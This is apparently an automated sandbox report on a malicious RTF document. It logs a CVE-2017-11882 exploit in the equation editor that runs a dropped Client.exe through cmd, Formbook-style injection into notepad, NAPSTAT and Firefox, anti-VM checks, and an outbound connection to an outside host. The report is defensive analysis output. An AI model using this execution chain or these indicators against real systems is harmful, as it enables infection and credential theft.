          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B6373B appears 217 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B63F92 appears 116 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B8F970 appears 80 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B1DF5C appears 111 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B1E2A8 appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F24A0 NtQuerySystemInformation, 5_2_001F24A0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F2498 NtQuerySystemInformation, 5_2_001F2498
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_00E9DC10 NtSetContextThread, 5_2_00E9DC10
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_00E9D1F0 NtProtectVirtualMemory, 5_2_00E9D1F0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_00E9CD08 NtAllocateVirtualMemory, 5_2_00E9CD08
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_00E9F100 NtResumeThread, 5_2_00E9F100
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_00E9D700 NtWriteVirtualMemory, 5_2_00E9D700
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C4B8D8 NtCreateThreadEx, 5_2_04C4B8D8
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C4B3F8 NtWriteVirtualMemory, 5_2_04C4B3F8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AD40 NtCreateFile, 9_2_0041AD40
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041ADF0 NtReadFile, 9_2_0041ADF0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AE70 NtClose, 9_2_0041AE70
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AF20 NtAllocateVirtualMemory, 9_2_0041AF20
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AD3A NtCreateFile, 9_2_0041AD3A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AE6A NtClose, 9_2_0041AE6A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041AF1A NtAllocateVirtualMemory, 9_2_0041AF1A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B100C4 NtCreateFile, LdrInitializeThunk, 9_2_00B100C4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B10078 NtResumeThread, LdrInitializeThunk, 9_2_00B10078
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B10048 NtProtectVirtualMemory, LdrInitializeThunk, 9_2_00B10048
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B107AC NtCreateMutant, LdrInitializeThunk, 9_2_00B107AC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0F9F0 NtClose, LdrInitializeThunk, 9_2_00B0F9F0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0F900 NtReadFile, LdrInitializeThunk, 9_2_00B0F900
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FAE8 NtQueryInformationProcess, LdrInitializeThunk, 9_2_00B0FAE8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FAD0 NtAllocateVirtualMemory, LdrInitializeThunk, 9_2_00B0FAD0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FBB8 NtQueryInformationToken, LdrInitializeThunk, 9_2_00B0FBB8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FB68 NtFreeVirtualMemory, LdrInitializeThunk, 9_2_00B0FB68
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FC90 NtUnmapViewOfSection, LdrInitializeThunk, 9_2_00B0FC90
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FC60 NtMapViewOfSection, LdrInitializeThunk, 9_2_00B0FC60
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FD8C NtDelayExecution, LdrInitializeThunk, 9_2_00B0FD8C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FDC0 NtQuerySystemInformation, LdrInitializeThunk, 9_2_00B0FDC0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FEA0 NtReadVirtualMemory, LdrInitializeThunk, 9_2_00B0FEA0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FED0 NtAdjustPrivilegesToken, LdrInitializeThunk, 9_2_00B0FED0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FFB4 NtCreateSection, LdrInitializeThunk, 9_2_00B0FFB4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B110D0 NtOpenProcessToken, 9_2_00B110D0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B10060 NtQuerySection, 9_2_00B10060
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B101D4 NtSetValueKey, 9_2_00B101D4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B1010C NtOpenDirectoryObject, 9_2_00B1010C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B11148 NtOpenThread, 9_2_00B11148
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0F8CC NtWaitForSingleObject, 9_2_00B0F8CC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B11930 NtSetContextThread, 9_2_00B11930
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0F938 NtWriteFile, 9_2_00B0F938
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FAB8 NtQueryValueKey, 9_2_00B0FAB8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FA20 NtQueryInformationFile, 9_2_00B0FA20
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FA50 NtEnumerateValueKey, 9_2_00B0FA50
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FBE8 NtQueryVirtualMemory, 9_2_00B0FBE8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FB50 NtCreateKey, 9_2_00B0FB50
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FC30 NtOpenProcess, 9_2_00B0FC30
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B10C40 NtGetContextThread, 9_2_00B10C40
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FC48 NtSetInformationFile, 9_2_00B0FC48
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B11D80 NtSuspendThread, 9_2_00B11D80
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00B0FD5C NtEnumerateKey, 9_2_00B0FD5C
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: mozglue.dll
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: winsqlite3.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe | Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\notepad.exe | Memory allocated: 77740000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 77620000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 77740000 page execute and read and write
          Source: Client.exe.0.dr | Static PE information: Section: bdzG4e ZLIB complexity 1.0003269937782806
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | ReversingLabs: Detection: 14%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR582D.tmp
          Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | Static file information: File size 2883613 > 1048576
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_01185096 push 00000020h; iretd 5_2_01185099
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_01189ABE push ebx; ret 5_2_01189B10
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_011828DB pushfd ; retf 5_2_011828DC
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_011854E3 push 00000020h; iretd 5_2_011854E6
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001FA050 push eax; retf 001Eh 5_2_001FA051
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F907A push esp; ret 5_2_001F9091
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F9092 pushfd ; ret 5_2_001F9111
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001FAA30 push eax; iretd 5_2_001FAA31
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001FAA50 pushad ; iretd 5_2_001FAA51
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F8EDD push eax; retn 001Eh 5_2_001F8ED9
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_001F8ED8 push eax; retn 001Eh 5_2_001F8ED9
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C43EA9 push 03682C01h; ret 5_2_04C43EB9
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C4381A push 800FD82Bh; retf 006Dh 5_2_04C4381F
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C4301A push 800FD82Bh; retf 0075h 5_2_04C4301F
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C4371A push 800FD82Bh; retf 006Eh 5_2_04C4371F
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C632BC push 800FD82Bh; retf 5_2_04C632C1
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C642B8 push 800FD82Bh; iretd 5_2_04C642BD
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C647BD push 800FD82Bh; retf 005Fh 5_2_04C647C2
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C63DBB push 800FF02Bh; retf 0069h 5_2_04C63DC2
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C64FB8 push 800FC303h; iretd 5_2_04C64FBD
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04C61B75 push 800FC303h; retn 0002h 5_2_04C61B7C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 5_2_04E4585D push 800FD82Bh; retf 5_2_04E45888
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041E075 push eax; ret 9_2_0041E0C8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0040880F push ebx; iretd 9_2_00408810
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041E0C2 push eax; ret 9_2_0041E0C8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_004140CB push 00000011h; retf 9_2_004140CD
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041E0CB push eax; ret 9_2_0041E132
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041B11A push edi; retf 9_2_0041B11B
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041E12C push eax; ret 9_2_0041E132
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0040D2D0 pushfd ; retf 9_2_0040D348
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00406AE4 push ebp; ret 9_2_00406AE5
          Source: Client.exe.0.dr | Static PE information: section name: bdzG4e
          Source: Client.exe.0.dr | Static PE information: section name:
          Source: initial sample | Static PE information: section name: bdzG4e entropy: 7.99949678623572
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1404Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2252Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2652Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc 9_2_00B60101
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01188E9C sldt word ptr [eax]5_2_01188E9C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027105135.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.968616738.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: EQNEDT32.EXE, 00000002.00000003.898154429.00000000005C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmcicda.dll
          Source: explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B60101 rdtsc 9_2_00B60101
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B00080 mov ecx, dword ptr fs:[00000030h]9_2_00B00080
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B000EA mov eax, dword ptr fs:[00000030h]9_2_00B000EA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B226F8 mov eax, dword ptr fs:[00000030h]9_2_00B226F8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00363550 LdrLoadDll,5_2_00363550
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe; Domain query: www.magadirect.co.uk
Source: C:\Windows\explorer.exe; Network Connect: 45.33.18.44 80
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
Source: C:\Windows\SysWOW64\notepad.exe; Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: A00000
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 190000
Source: C:\Windows\SysWOW64\notepad.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\notepad.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\notepad.exe; Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Thread register set: target process: 1860
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Thread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager<
Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Client.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match; File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
